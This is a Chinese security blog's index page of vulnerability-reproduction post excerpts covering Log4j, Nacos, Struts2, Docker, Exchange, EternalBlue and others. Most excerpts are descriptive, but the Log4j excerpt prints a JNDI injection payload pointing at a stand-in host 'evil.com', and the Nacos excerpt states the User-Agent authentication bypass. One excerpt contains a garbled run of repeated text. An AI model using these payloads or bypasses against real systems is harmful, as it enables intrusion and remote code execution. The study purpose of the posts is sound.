crowsec

Nacos身份绕过漏洞（QVD-2023-6271）复现学习

永恒之蓝(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有：CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之蓝漏洞复现，99%的师傅选择的都是Windows7或者。

CVE-2023-21839漏洞复现

【实战】一次简单的log4j漏洞测试

CVE-2022-39197这个xss的rce，我只复现了xss和简单版本的NTLM哈希窃取。。。从前几天开始，网上开始讨论关于cobalt strike的CVE-2022-39197漏洞，据说该漏洞可以直接接管服务端的权限。

SpringBootActuator模块提供了生产级别的功能，比如健康检查，审计，指标收集，HTTP跟踪等，帮助监控和管理SpringBoot应用。这个模块是一个采集应用内部信息暴露给外部的模块，上述的功能都可以通过HTTP和JMX访问。https）Actuator是SpringBoot提供的应用系统监控的开源框架。https）httpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttps。...

Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...

Confluence是一款专业的企业知识管理与协同软件，常用于企业wiki的构建，支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作，具有较为便捷的编辑和站点管理特性。漏洞仅限本地复现使用,请遵守网络安全法律法规,违者使用与本程序开发者无关...

2022年04月13号，apache官网公布了Struts2 最新版远程代码执行漏洞，该漏洞编号为CVE-2021-31805。 Apache Struts2是一个用于开发Java EE网络应用程序的Web框架。在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。本次漏洞是对CVE-2020-17530修复之后的绕过，当使用语法%{...}应用强制OGNL解析，某些tag标签的属性仍然可以被二次解析。

在昨天发的文章里面，看到了t00ls上TRY写的工具（因为当时不确定文章能不能发，所以我就没放链接，在这里和师傅说声抱歉），但是貌似还没有python的版本，加上晚间又看到有师傅发了全文分析的pdf文件，所以在这里在前辈的基础上分析下这个RCE怎么写，怎么用python实现它。

CVE-2020-17518复现

在2021年4月13日之前，Windows Chrome浏览器在版本号小于89.0.4389.114的版本中存在非沙箱模式0day，4月14日windows Chrome浏览器全部更新，目前最新版本号为89.0.4389.128，该最新版本存在远程代码执行漏洞（需要关闭沙箱！！！）

2021.04.13更新——近日Windows Chrome 0day爆出0day漏洞，目前对所有普通用户的Windows Chrome浏览器均有效，但是利用比较鸡肋

如果在docker上配置了远程访问，docker 节点上会开放一个TCP端口2375，绑定在0.0.0.0上，如果没有做限制的话，攻击者就可以通过Docker未授权来控制服务器扫取二维码获取更多信息！微信公众号：乌鸦安全扫取二维码获取更多信息！

微信公众号：乌鸦安全扫取二维码获取更多信息！更新日期：2021.04.21参考链接https://github.com/briskets/CVE-2021-3493https://www.pwnwiki.org/index.php?title=CVE-2021-3493_linux_kernel_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E/zh-cn影响版本Ubuntu 20.10Ubu..

微信公众号：乌鸦安全扫取二维码获取更多信息！01漏洞描述Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。参考地址：https://github.com/vulhub/vulhub本次漏洞复现也是基于Vulhub02漏洞环...

微信公众号：乌鸦安全扫取二维码获取更多信息！01.参 考 资 料本复现大量参考：https://github.com/Yihsiwei/Log4j-exp本次复现仅仅帮助他人本地复现漏洞。在网上已经有很多人复现漏洞，但是对于不会java的童鞋，又想研究后续命令执行上线的童鞋来说，无疑是非常困难的，于是对比了几个版本之后，在这里对于本地漏洞复现做一个文字记录。请大家严格遵守《漏洞管理条例》和《网络安全法》02.本地复现步骤复现环境：wind...

01 漏洞描述参考资料：https://xz.aliyun.com/t/8021由于74CMS 某些函数存在过滤不严格，攻击者通过构造恶意请求，配合文件包含漏洞可在无需登录的情况下执行任意代码，控制服务器。下载地址：http://www.74cms.com/download/index.html注意： 骑士cms不支持php7.x，复现php环境为php5.x即可 版本低于6.0.48 本文复现版本：74c...

影响版本：Microsoft Exchange Server 2010 Service Pack 3Microsoft Exchange Server 2013Microsoft Exchange Server 2016Microsoft Exchange Server 2019漏洞介绍：所有Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewSta